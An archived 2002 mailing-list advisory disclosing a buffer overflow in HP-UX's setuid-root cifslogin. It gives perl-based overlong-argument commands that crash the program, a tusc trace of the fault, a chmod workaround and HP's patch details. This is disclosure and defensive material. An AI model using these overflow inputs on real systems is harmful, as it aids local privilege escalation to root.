OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Alex Hernandez (alex_hernandezureach.com)
Date: Mon Jun 24 2002 - 07:19:52 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Sharity Cifslogin Buffer Overflow (arguments)
    =============================================

    Author:

    ** Alex Hernandez <alex_hernandezureach.com> (C) 2002

    ** Thanks all the people from Spain and Argentina.
    ** Greets to: Paco Spain, Gabriel M, L.martins.
    ** Thanks friends for all ur help Zillion & Kevin from
    ** Snosoft http://www.snosoft.com :-).

    Affected system:
    ================

    HP-UX ALL

    What is Sharity?
    ================

    Sharity is a software package that runs on Unix machines and
    allows you to
    mount shares exported by Windows (NT, 95, for Workgroups,
    etc.), OS/2,
    samba etc. in your filesystem. It's NOT an ftp-like client like
    the
    smbclient program distributed with samba, it really mounts the
    shares in
    your filesystem just as NFS does. Since the major release 2,
    Sharity
    supports browsing (like the Windows "Network Neighborhood") and
    has a GUI
    for dialogs and for the configuration.

    Description:
    ============

    TESTED IN HP-UX

    This command logs the calling user in to a server. While the
    login
    is established, all file accesses by the calling user are
    performed
    under the permissions available at the server with the
    credentials
    passed to cifslogin. <server> must be the netbios name of the
    server
    where you want to log in. If the server is in share-level
    security
    mode, you must use the second form and specify the share you
    want to
    log in to. The server name must be resolvable through the
    netbios
    name service or with DNS. If neither gives an IP address, you
    can
    configure the IP address explicitly in the configuration file.
    Valid options are:

        -h Print short help and exit
        -U <username> Login on server as this user. By default, the
    remote
             username is the same as the calling user's local name.
        -D <domain> Send this domain name to server. If not
    specified,
             Sharity's default domain is used. Some servers accept
    connects
             only from clients from their own domain.
        -P <password> Password given in commandline. Using this
    option is
             STRONGLY discouraged because it will write your
    password to the
             shell's history file.
        -S Read password from standard input (implies -N). This
    option can
             be used if the password is created by an external
    program (e.g.
             retrieved from a database).
        -N Don't prompt for a password. If no password is given
    by the -P
             or -S options, use an empty password.
        -u Allow sending password unencrypted. Sharity does not
    allow
             sending unencrypted passwords by default (for security
    reasons).

    If you don't specify a share name for a share-level security
    server,
    cifslogin prompts the user for the share name.

    If the password is not supplied with the -S or -P option and if
    the user is not already logged in, cifslogin prompts the user
    for
    a password.

    A security vulnerability in the product allows local users to
    overflow one of
    the parameters (-U, -D, -P, -S, -N, -u,) and cause the
    application to execute
    arbitrary code. Since the program is setuid root, elevated
    privileges
    can be gained.

    In case that the attacker provide an overlong filename (for
    example, longer
    than 10000 bytes) for example parameter "-P", it would overflow
    a dynamic
    allocated buffer.The attacker could modify arbitrary memory
    address (such as
    saved return address, and function pointer, etc.) with some
    features of
    malloc()/free() implementation by overwriting the border data
    structure
    of the next dynamic memory chunk.

    On HP-UX platform, attacker could obtain root group privilege;

    Exploit:
    ==========

    $ id
    uid=110(alex) gid=102(informix)
    $

    $ uname -a
    HP-UX Lab02 B.11.11 U 9000/800 1613339393 unlimited-user license
    $

    $ ls -la /opt/cifsclient/bin/cifslogin
    -rwsr-xr-x 1 root users 53248 Mar 28
    2001 /opt/cifsclient/bin/cifslogin

    $ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x10000}'`
    Memory fault

    $

    MAPPED WITH TUSC:

    Brief description about the command:

    tusc-7.3

    Traces the system calls a process invokes in HP-UX 11. It
    displays arguments in a symbolic way, shows the
    first bytes of read and write buffers and shows signal
    information when available. Tusc can attach to live
    processes by providing PIDs as arguments. This release also
    provides a truss command compatible with the
    equivalent Solaris utility. Note that source code is
    unavailable for tusc and that the shipped tusc binary
    ONLY works on HP-UX 11.X. Please download the equivalent
    package for HP-UX 10.X - called trace -
    if you don't have HP-UX 11.X.

    Download for HP-UX:

    http://hpux.cs.utah.edu/hppd/hpux/Sysadmin/tusc-7.3/

    Proof of Concept:

    $ ./tusc /opt/cifsclient/bin/cifslogin -P `perl -
    e '{print "A"x10000}'`

    execve("/opt/cifsclient/bin/cifslogin", 0x7f7f2b68,
    0x7f7f2b78) ........................................ = 0 [32-
    bit]
    utssys(0x7f7f4c50, 0,
    0) .............................................................
    .................. = 0
    open("/usr/lib/dld.sl", O_RDONLY,
    025564) ........................................................
    ...... = 3
    read(3, "02\v010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \002\0ac\0\0\0\0"..,
    48) ...................................................... = 48
    mmap(NULL, 131244, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB,
    3, 0x9000) ............................... = 0xc0010000
    mmap(NULL, 14696, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_SHLIB, 3, 0x2a000) ................... =
    0x7b050000
    close
    (3) ............................................................
    ................................... = 0
    getuid
    () .............................................................
    .................................. = 110 (110)
    getuid
    () .............................................................
    .................................. = 110 (110)
    getgid
    () .............................................................
    .................................. = 102 (102)
    getgid
    () .............................................................
    .................................. = 102 (102)
    mmap(NULL, 8192, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................. =
    0x7b04e000
    sysconf
    (_SC_CPU_VERSION) ..............................................
    ................................. = 532
    open("/opt/graphics/OpenGL/lib/libogltls.sl", O_RDONLY,
    0) ............................................. ERR#2 ENOENT
    open("/usr/lib/libc.2", O_RDONLY,
    0) .............................................................
    ...... = 3
    fstat(3,
    0x7f7f54c8) ....................................................
    ............................... = 0
    read(3, "0214010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \014( , \0\010\0"..,
    48) ...................................................... = 48
    read(3, "80\0\0\v\0\0\004\0\0\0\0",
    12) ............................................................
    .... = 12
    lseek(3, 446464,
    SEEK_SET) ......................................................
    ....................... = 446464
    read(3, "058cy 10\0\0\a90\0\0M e8\0\0\002"..,
    112) ..................................................... = 112
    mmap(NULL, 1323008, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB,
    3, 0x6d000) ............................. = 0xc0100000
    mmap(NULL, 45056, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ....... =
    0x7b043000
    mmap(0x7b03b000, 32768, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0x1b0000) .. = 0x7b03b000
    mmap(NULL, 16384, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) ................. =
    0x7b037000
    close
    (3) ............................................................
    ................................... = 0
    open("/usr/lib/libdld.2", O_RDONLY,
    0) .............................................................
    .... = 3
    fstat(3,
    0x7f7f55c8) ....................................................
    ............................... = 0
    read(3, "02\v010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \0\0$ e4\0\010\0"..,
    48) ...................................................... = 48
    read(3, "80\0\0\v\0\0\004\0\0\0\0",
    12) ............................................................
    .... = 12
    lseek(3, 8192,
    SEEK_SET) ......................................................
    ......................... = 8192
    read(3, "058cy 10\0\0\0\f\0\001ac\0\0\001"..,
    112) ..................................................... = 112
    mmap(NULL, 12288, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 3,
    0x2000) ................................ = 0xc0004000
    mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_SHLIB, 3, 0x5000) ..................... =
    0x7b036000
    close
    (3) ............................................................
    ................................... = 0
    open("/usr/lib/libc.2", O_RDONLY,
    0) .............................................................
    ...... = 3
    fstat(3,
    0x7f7f56c8) ....................................................
    ............................... = 0
    read(3, "0214010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \014( , \0\010\0"..,
    48) ...................................................... = 48
    read(3, "80\0\0\v\0\0\004\0\0\0\0",
    12) ............................................................
    .... = 12
    lseek(3, 446464,
    SEEK_SET) ......................................................
    ....................... = 446464
    read(3, "058cy 10\0\0\a90\0\0M e8\0\0\002"..,
    112) ..................................................... = 112
    mmap(NULL, 1323008, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB,
    3, 0x6d000) ............................. ERR#12 ENOMEM
    close
    (3) ............................................................
    ................................... = 0
    open("/usr/lib/libnsl.1", O_RDONLY,
    0) .............................................................
    .... = 3
    fstat(3,
    0x7f7f54c8) ....................................................
    ............................... = 0
    read(3, "0210010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \0\b9384\0\010\0"..,
    48) ...................................................... = 48
    read(3, "80\0\0\v\0\0\004\0\0\0\0",
    12) ............................................................
    .... = 12
    lseek(3, 131072,
    SEEK_SET) ......................................................
    ....................... = 131072
    read(3, "058cy 10\0\004 \0\0; L \0\0\002"..,
    112) ..................................................... = 112
    mmap(NULL, 565248, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB,
    3, 0x20000) .............................. = 0xc0280000
    mmap(NULL, 24576, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ....... =
    0x7b030000
    mmap(0x7b029000, 28672, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0xaa000) ... = 0x7b029000
    mmap(NULL, 8192, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................. =
    0x7b027000
    close
    (3) ............................................................
    ................................... = 0
    stat("/usr/lib/libxti.2",
    0x7f7f5500) ....................................................
    .............. = 0
    mmap(NULL, 16384, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) ................. =
    0x7b023000
    open("/usr/lib/libxti.2", O_RDONLY,
    0) .............................................................
    .... = 3
    fstat(3,
    0x7f7f55c8) ....................................................
    ............................... = 0
    read(3, "0210010e0512 \0\0\0\0\0\0\0\0\0"..,
    128) ..................................................... = 128
    lseek(3, 128,
    SEEK_SET) ......................................................
    .......................... = 128
    read(3, "10\0\004\0\0\0( \001~ l \0\010\0"..,
    48) ...................................................... = 48
    read(3, "80\0\0\v\0\0\004\0\0\0\0",
    12) ............................................................
    .... = 12
    lseek(3, 28672,
    SEEK_SET) ......................................................
    ........................ = 28672
    read(3, "058cy 10\0\0\0d8\0\0\ac0\0\0\001"..,
    112) ..................................................... = 112
    mmap(NULL, 98304, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 3,
    0x7000) ................................ = 0xc0060000
    mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ........ =
    0x7b022000
    mmap(0x7b020000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0x1f000) .... = 0x7b020000
    close
    (3) ............................................................
    ................................... = 0
    mmap(NULL, 80, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................... =
    0x7b01f000
    sigsetreturn(0x7b038fce, 0x6211988,
    1392) ..........................................................
    .... = 0
    alarm
    (0) ............................................................
    ................................... = 0
    getuid
    () .............................................................
    .................................. = 110 (110)
    getuid
    () .............................................................
    .................................. = 110 (110)

      Received signal 11, SIGSEGV, in user mode, [SIG_DFL], partial
    siginfo
        Siginfo: si_code: I_NONEXIST, faulting address: 0x4141414d,
    si_errno: 0
        PC: 0xc01ef413, instruction: 0x443f0018
    exit(11)
    [implicit] .....................................................
    ...............................
    WIFSIGNALED(SIGSEGV)

    $

    Others Parameters Vulnerables:

    $ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x2072}'`
    Memory fault

    $ /opt/cifsclient/bin/cifslogin -s `perl -e '{print "A"x2072}'`
    Memory fault

    $ /opt/cifsclient/bin/cifslogin -f `perl -e '{print "A"x2072}'`
    Memory fault

    $ /opt/cifsclient/bin/cifslogin -u `perl -e '{print "A"x2072}'`
    Memory fault

    $ /opt/cifsclient/bin/cifslogin -S `perl -e '{print "A"x2072}'`
    Memory fault

    $ /opt/cifsclient/bin/cifslogin -N `perl -e '{print "A"x2072}'`
    Memory fault

    Workaround:
    ===================

    Temporarily remove the suid root or sgid root attribute of
    cifslogin:

    # chmod a-s /opt/cifsclient/bin/cifslogin

    Vendor Status:
    ==============

    ---
    Contact information:
    e-mail: sharityobdev.at
    www:    http://www.obdev.at/
    Author: Christian Starkjohann <csobdev.at>
    

    Response:

    Date Sat, 15 June 2002 8:54:01am From Sharity Support <sharity-supportobdev.at> Add to address book To <alex_hernandezureach.com>

    The /opt/cifsclient/bin/cifslogin program is NOT part of Sharity. This is HP's CIFS client. HP has based this client on an old version of Sharity which they have licensed.

    I will forward your report to the people at HP who are responsible for this software. I'll give credits to you, of course.

    Thanks for reporting this problem!

    Regards, Christian.

    --- Sharity Support, Objective Development. sharity-supportobdev.at

    --------- security-alerthp.com securehpchs.cup.hp.com

    Response:

    Date Mon, 17 June 2002 2:40:18pm From HP S/W Security Team <securehpchs.cup.hp.com> Add to address book To alex_hernandezureach.com

    Hello Mr: Hernandez,

    Please read it, retrieve the patch, and apply it to your Lab02 11.11 installation. The patch can be retrieved *without* a support contract by registering with itrc.hp.com. (Registration is for simplified mailing list maintenance on our part. Without that - no patches can be retrieved.)

    Yours Truly, WTEC HP S/W Security Team. --

    FIXES: ======

    Recommended solution

    *REVISED01*

    -->>>Upgrade to A.01.06, and then install patch PHNE_24164 for -->>>HP-UX release 11.00 or 11.11. -->>>When available, A.01.07 will include this fix. -->>>Download this application software from -->>>www.software.hp.com, under the Network and System -->>>Management area. Download the patch from itrc.hp.com.

    To subscribe to automatically receive future NEW HP Security Bulletins from the HP IT Resource Center via electronic mail, do the following:

    Use your browser to get to the HP IT Resource Center page at:

    http://itrc.hp.com

    For information on the Security Patch Check tool, see:

    http://www.software.hp.com/cgi- bin/swdepot_parser.cgi/cgi/displayProductInfo .pl?productNumber=B6834AA"

    This vulnerabilty can be fix with SAMBA Bugs HP-UX:

    **REVISED01**HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #0155, 27 June '01 LAST REVISED: 15 August '01 --------------------------------------------------------------- --------

    The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible.

    --------------------------------------------------------------- --------

    PROBLEM: CIFS/9000 Server (SAMBA) allows malicious local users to overwrite arbitrary files and devices.

    PLATFORM: HP 9000 servers running CIFS/9000 Server version A.01.06, or lower.

    DAMAGE: Arbitrary files and devices can be overwritten.

    *REVISED01* SOLUTION: Upgrade to A.01.06, and then install patch PHNE_24164. --->>>When available, A.01.07 will include this fix.

    *REVISED01* AVAILABILITY: The patch is available now.

    [...]

    Alex Hernandez <alex_hernandezureach.com> (C) 2002

    ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag